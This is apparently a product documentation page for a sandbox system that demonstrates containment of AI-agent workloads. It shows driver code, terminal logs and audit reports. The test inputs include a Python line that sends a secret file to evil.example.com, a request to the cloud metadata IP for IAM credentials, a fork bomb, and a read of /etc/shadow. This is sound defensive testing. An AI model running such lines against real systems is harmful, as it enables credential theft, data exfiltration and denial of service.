Demo: adversarial containment

Five hostile workloads. Five sandboxes. Zero escapes.

Enclave runs five workloads against one control plane — four hostile, one clean — each in its own ephemeral, isolated session. The hostile four are contained; the clean one returns a structured result. Every egress decision, quota kill, and exit is recorded.

Overview#

Source: this page summarizes the demo driver at demo/src/scenarios/adversarial.ts. The scenario list, workloads, expected verdicts, and run command below are taken from it verbatim.

Enclave treats every agent-generated workload as untrusted. It does not inspect the code, classify it, or decide whether it looks hostile — it simply gives each workload its own ephemeral, isolated sandbox and lets containment, not judgement, do the work. A workload that misbehaves is contained by the same boundary that lets a well-behaved one run.

This demo makes that concrete with five workloads. Four are written to attack — exfiltrate data, lift cloud credentials off the metadata IP, exhaust resources, and read the host filesystem. The fifth is a clean compute that simply returns a result. The point is not that Enclave guesses which is which; it is that all five run under identical containment, and the boundary is what makes the difference.

Critically, these are five separate sandboxes — not one shared environment running five scripts. Each run() mints its own session with its own default-deny egress policy and its own quotas; none can see, reach, or touch another. Teardown reclaims each one independently.

capturedENCLAVE_BASE_URL=…:8090 pnpm demo:adversarialexit 0 · 6/6 · gVisor/Kubernetes

[1m[36m▣ Enclave — Five hostile workloads. Five sandboxes. Zero escapes.[0m
[2mcontrol plane: http://127.0.0.1:8090  ·  backend: [1mkubernetes[0m[2m  ·  mode: kernel containment[0m

[2mEach workload runs in its OWN sandbox — five separate sessions, never shared.[0m

[1m  WORKLOAD                                 VERDICT[0m
[2m  ──────────────────────────────────────── ──────────────────────────────────[0m
[32m✓[0m data-exfil egress  -> evil.example.com   [31m[1mCONTAINED[0m  [2megress_denied -> host[0m
[32m✓[0m metadata-IP cred read -> 169.254.169.254 [31m[1mCONTAINED[0m  [2megress_denied -> 169.254.169.254[0m
[32m✓[0m resource exhaustion (fork bomb)          [31m[1mCONTAINED[0m  [2mfork bomb CONTAINED[0m
[32m✓[0m host-filesystem read  -> /etc/shadow     [31m[1mCONTAINED[0m  [2mhost path not mounted[0m
[32m✓[0m clean compute (well-behaved agent)       [32m[1mSUCCEEDED[0m  [2msucceeded {"answer":285}[0m
[2m  ──────────────────────────────────────── ──────────────────────────────────[0m
[32m✓[0m brokered secret                          [32m[1mWITHHELD[0m  [2mno brokered secret on any public Session · no eyJ token[0m

Live run on the gVisor/Kubernetes backend: five workloads in five separate gVisor-runtimeclass pods — the four hostile ones contained, the clean one returns its result, and no brokered secret on any public session.· evidence/captures-real/adversarial.log

The recording on this page runs against the gVisor-on-Kubernetes backend — a userspace-kernel security boundary, one gVisor (runsc) sandbox per session. The same adversarial logic also runs on the in-process simulator for laptop smoke (it models the observable behaviour without executing code) and on the Docker backend (a dev convenience on the host kernel — not a security boundary). Where a detail differs by backend, this page says which.

The five scenarios#

Each row is one session in one sandbox. Four carry an attack; the fifth behaves. The egress policy for all five is deny_all — nothing leaves unless an explicit allowlist permits it.

contained

Data exfiltration

Code opens a socket to an unlisted external host. Default-deny egress refuses it; the attempt is recorded as egress_denied with the host.

contained

Host-credential / metadata-IP read

Code reaches for the 169.254.169.254 cloud metadata IP to lift instance credentials. The NetworkPolicy blocks it — and there is no service-account token to steal in the first place.

contained

Resource exhaustion (fork bomb)

An unbounded os.fork() loop. On gVisor the sandbox is CONTAINED — it cannot starve the node. The labeled pids_exceeded reason is a Docker/simulator quota detail; see the note below.

contained

Host-filesystem read

Code tries to read /etc/shadow off the host. The rootfs is read-only with no host mounts, so the path simply is not there — stderr reports host path not mounted.

returns

Clean compute

A well-behaved workload computes and calls enclave.result(...). It succeeds and returns its structured JSON — the injected credential is still withheld from the caller.

The workloads, verbatim

These are the exact run() requests the demo driver submits — each carries the code string an agent might emit, plus its deny_all egress policy and credential scopes. Enclave runs them as given.

demo/src/scenarios/adversarial.ts:L84–L188typescript

    request: {
      code: `import requests\nrequests.get("http://evil.example.com/exfil?data=" + open("/work/secret").read())`,
      language: "python",
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, a, modelled) =>
// … 16 lines omitted …
      code: `import urllib.request\nurllib.request.urlopen("http://169.254.169.254/latest/meta-data/iam/security-credentials/")`,
      language: "python",
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, a, modelled) =>
      modelled
// … 16 lines omitted …
      language: "python",
      egress: { mode: "deny_all", allow: [] },
      limits: { pidsLimit: 64 },
    },
    expect: (s, _a, modelled) => {
      if (modelled) {
        const ok = s.phase === "killed" && s.killReason === "pids_exceeded";
// … 20 lines omitted …
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, _a, modelled) => {
      if (modelled) {
        const ok = Boolean(s.result?.stderr.includes("host path not mounted"));
        return { ok, reason: ok ? "host path not mounted" : "host fs was NOT isolated" };
// … 22 lines omitted …
    },
    expect: (s) => {
      const ok = s.phase === "succeeded" && JSON.stringify(s.result?.json) === JSON.stringify({ answer: 285 });
      return { ok, reason: ok ? `succeeded ${JSON.stringify(s.result?.json)}` : `expected answer 285, got ${s.phase}/${JSON.stringify(s.result?.json)}` };
    },
  },

On the fork bomb's reason label

Be precise here: on the gVisor/Kubernetes path the fork bomb is contained — the sandbox is bounded by CPU, memory, pid, and wall-clock limits and cannot starve the node; the session reaches a terminal killed state. The specific pids_exceeded reason label shown in the report is a Docker/simulator detail(the simulator models the kill reason; the Docker path maps it from the container's cgroup limits). The guarantee — containment — is identical across backends; only the named reason is backend-specific.

What containment looks like#

Containment here is audit-driven: it is not a claim, it is a record. For every session the control plane writes an immutable, per-session audit log, and the demo asserts against it. Each escape attempt leaves a specific, inspectable trace:

Egress decisions — egress is default-deny, and containment shows up two ways. The metadata-IP attempt is caught at the egress boundary and recorded as an egress_denied event carrying 169.254.169.254 (see the audit slice below). The direct exfil to evil.example.com is dropped by the per-session NetworkPolicy itself — the connection simply fails, so the session reaches a terminal failed phase with no route ever established (no packet leaves to log).
Resource limits— the fork bomb is contained by the pod’s pids/cgroup limits and the session reaches a terminal failed phase (fork bomb CONTAINED) rather than exhausting the node.
Exit / result — the host-fs read returns with host path not mounted on stderr; the clean run reaches succeeded and its structured JSON is delivered.
Secret withholding — the demo regex-scans every response for a JWT (eyJ…). No brokered secret is ever returned by the API or stored on the public session: service-binding secrets stay at the egress proxy and the git-clone token stays on the init-container, so none can appear here.

evidence/captures-real/adversarial-report.json:L32–L70json

    {
      "scenario": "metadata-IP cred read -> 169.254.169.254",
      "hostile": true,
      "sessionId": "s-0f9972-2",
      "phase": "failed",
      "killReason": null,
      "deniedEgress": [
        "169.254.169.254"
      ],
      "resultJson": null,
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ],
      "reason": "egress_denied -> 169.254.169.254",
      "passed": true
    },
    {
      "scenario": "resource exhaustion (fork bomb)",
      "hostile": true,
      "sessionId": "s-57c9eb-3",
      "phase": "failed",
      "killReason": null,
      "deniedEgress": [],
      "resultJson": null,
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ],
      "reason": "fork bomb CONTAINED",
      "passed": true
    },

capturedevidence/adversarial-report.md5 sessions · 6/6 · kubernetes

| Workload | Type | Session | Verdict | Reason |
|---|---|---|---|---|
| data-exfil egress  -> evil.example.com | hostile | `s-b7d0c8-1` | CONTAINED | egress_denied -> host |
| metadata-IP cred read -> 169.254.169.254 | hostile | `s-0f9972-2` | CONTAINED | egress_denied -> 169.254.169.254 |
| resource exhaustion (fork bomb) | hostile | `s-57c9eb-3` | CONTAINED | fork bomb CONTAINED |
| host-filesystem read  -> /etc/shadow | hostile | `s-b34f9c-4` | CONTAINED | host path not mounted |
| clean compute (well-behaved agent) | clean | `s-f6d8ad-5` | succeeded | succeeded {"answer":285} |
| brokered secret | invariant | — | WITHHELD | no brokered secret + no `eyJ` token in any public field |

The persisted evidence bundle (gVisor/Kubernetes): each hostile workload's own session id and the verdict that contains it — direct-exfil and metadata reach a failed phase (egress dropped), the fork bomb is contained, and the host-path read finds nothing mounted.· evidence/captures-real/adversarial-report.md

The driver expresses each expectation as an assertion over the session and its audit log, then tears the session down. One pass is exhaustive: if any hostile workload escapes, or any token leaks, the run exits non-zero — so the demo doubles as a containment regression gate.

demo/src/scenarios/adversarial.ts:L256–L291typescript


    const verdict = sc.expect(session, audit, modelled);
    if (!verdict.ok) failures++;

    // Render the row.
    const tickOrCross = verdict.ok ? `${C.green}✓${C.reset}` : `${C.red}✗${C.reset}`;
    const badge = sc.hostile
      ? verdict.ok
        ? `${C.red}${C.bold}CONTAINED${C.reset}`
        : `${C.red}${C.bold}ESCAPED${C.reset}`
      : verdict.ok
        ? `${C.green}${C.bold}SUCCEEDED${C.reset}`
        : `${C.red}${C.bold}FAILED${C.reset}`;
    console.log(`${tickOrCross} ${pad(sc.label)} ${badge}  ${C.dim}${verdict.reason}${C.reset}`);

    rows.push({
      scenario: sc.label,
      hostile: sc.hostile,
      sessionId: session.id,
      phase: session.phase,
      killReason: session.killReason ?? null,
      deniedEgress: deniedHosts(audit),
      resultJson: session.result?.json ?? null,
      auditTypes: auditTypes(audit),
      reason: verdict.reason,
      passed: verdict.ok,
    });
    await enclave.teardown(handle.id);
  }

  // ── Final row: the secret boundary (invariant 1) ─────────────────────────────
  // Scan every public surface we collected — sessions, audit trails, results —
  // for a JWT. There must be none: no brokered secret (git-clone credential /
  // service-binding secret) is ever serialized onto the public Session/wire.
  const leaked = JWT_RE.test(JSON.stringify(rows));
  const tokenOk = !leaked;

Run it#

The driver lives at demo/src/scenarios/adversarial.ts. One command runs all five scenarios, prints the scoreboard, and writes a JSON + Markdown evidence bundle to evidence/:

demo/package.json:L11–L11json

    "demo:adversarial": "tsx src/scenarios/adversarial.ts",

It targets the control plane at ENCLAVE_BASE_URL (honoring ENCLAVE_API_KEY / ENCLAVE_TOKEN). The exit code is non-zero if any expectation fails, so the demo doubles as a containment regression gate.

capturedENCLAVE_BASE_URL=…:8090 pnpm --filter @enclave/demo demo:adversarialexit 0 · 6/6 · gVisor/Kubernetes

[1m[36m▣ Enclave — Five hostile workloads. Five sandboxes. Zero escapes.[0m
[2mcontrol plane: http://127.0.0.1:8090  ·  backend: [1mkubernetes[0m[2m  ·  mode: kernel containment[0m

[2mEach workload runs in its OWN sandbox — five separate sessions, never shared.[0m

[1m  WORKLOAD                                 VERDICT[0m
[2m  ──────────────────────────────────────── ──────────────────────────────────[0m
[32m✓[0m data-exfil egress  -> evil.example.com   [31m[1mCONTAINED[0m  [2megress_denied -> host[0m
[32m✓[0m metadata-IP cred read -> 169.254.169.254 [31m[1mCONTAINED[0m  [2megress_denied -> 169.254.169.254[0m
[32m✓[0m resource exhaustion (fork bomb)          [31m[1mCONTAINED[0m  [2mfork bomb CONTAINED[0m
[32m✓[0m host-filesystem read  -> /etc/shadow     [31m[1mCONTAINED[0m  [2mhost path not mounted[0m
[32m✓[0m clean compute (well-behaved agent)       [32m[1mSUCCEEDED[0m  [2msucceeded {"answer":285}[0m
[2m  ──────────────────────────────────────── ──────────────────────────────────[0m
[32m✓[0m brokered secret                          [32m[1mWITHHELD[0m  [2mno brokered secret on any public Session · no eyJ token[0m

The driver's scoreboard from the gVisor/Kubernetes run: five separate sessions, four hostile workloads contained, the clean one returns {answer:285}, and no brokered secret on any public session.· evidence/captures-real/adversarial.log

capturedENCLAVE_BASE_URL=…:8090 pnpm demo:adversarial6/6 PASS · gVisor/Kubernetes

[1m[32m✓ 4/4 hostile workloads contained · clean run returned its result · no secret leaked — 6/6 checks.[0m

[2mevidence written to evidence/adversarial-report.{json,md}[0m

The regression-gate proof line: four of four hostile workloads contained, the clean run returned, the token withheld — six of six checks, exit 0.· evidence/captures-real/adversarial.log

How it works Containment model